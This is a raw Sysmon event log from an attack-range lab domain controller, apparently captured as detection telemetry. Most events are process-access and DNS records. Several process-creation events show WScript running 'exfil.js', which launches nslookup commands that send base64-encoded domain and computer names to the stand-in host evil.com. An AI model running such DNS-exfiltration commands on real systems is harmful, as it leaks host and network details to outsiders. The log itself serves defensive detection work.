14:21:33.543{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209574Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.543{2E1864BB-18E0-629A-6742-000000005F02}39765580C:\Windows\System32\WScript.exe{2E1864BB-18ED-629A-E743-000000005F02}5976C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000209573Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.544{2E1864BB-18ED-629A-E743-000000005F02}5976C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluOiBhdHRhY2tyYW5nZS5sb2NhbA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nllklhap.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 354300x8000000000000000209572Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.043{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50733- 354300x8000000000000000209571Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.961{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50732- 354300x8000000000000000209570Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.960{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50731- 354300x8000000000000000209569Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.960{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50730- 23542300x8000000000000000209568Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.528{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlkmybxt.tmpMD5=13DAE9C9CF6ADD4F8F46BEAD8C3CC212,SHA256=2DEC16DD493989E01C6A3048EE3C7ECCED532832FC7BFFA4BF3297D9C89C0784,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000209567Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.512{2E1864BB-18ED-629A-E543-000000005F02}43447648C:\Windows\system32\conhost.exe{2E1864BB-18ED-629A-E643-000000005F02}7604C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209566Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.512{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209565Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.512{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18ED-629A-E643-000000005F02}7604C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209564Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.512{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209563Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.512{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209562Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.512{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209561Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.512{2E1864BB-18ED-629A-E443-000000005F02}80327144C:\Windows\system32\cmd.exe{2E1864BB-18ED-629A-E643-000000005F02}7604C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000209560Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.514{2E1864BB-18ED-629A-E643-000000005F02}7604C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A Q29tcHV0ZXJOYW1lOiBXSU4tREMtQ1QtQVRUQUM= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18ED-629A-E443-000000005F02}8032C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Q29tcHV0ZXJOYW1lOiBXSU4tREMtQ1QtQVRUQUM= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlkmybxt.tmp 2>&1 10341000x8000000000000000209559Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.481{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18ED-629A-E543-000000005F02}4344C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209558Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.481{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18ED-629A-E543-000000005F02}4344C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209557Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.481{2E1864BB-18ED-629A-E543-000000005F02}43447648C:\Windows\system32\conhost.exe{2E1864BB-18ED-629A-E443-000000005F02}8032C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209556Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.459{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18ED-629A-E543-000000005F02}4344C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209555Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.459{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18ED-629A-E443-000000005F02}8032C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209554Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.459{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209553Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.459{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209552Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.459{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209551Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.459{2E1864BB-18E0-629A-6742-000000005F02}39767156C:\Windows\System32\WScript.exe{2E1864BB-18ED-629A-E443-000000005F02}8032C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209550Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.459{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000209549Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.462{2E1864BB-18ED-629A-E443-000000005F02}8032C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Q29tcHV0ZXJOYW1lOiBXSU4tREMtQ1QtQVRUQUM= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlkmybxt.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 10341000x8000000000000000209548Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.444{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-18E2-629A-6E42-000000005F02}7308C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209547Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.444{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-18E2-629A-6E42-000000005F02}7308C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209546Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.444{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-18E2-629A-6E42-000000005F02}7308C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209545Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.444{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-18E2-629A-6E42-000000005F02}7308C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209544Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.444{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-18E2-629A-6E42-000000005F02}7308C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9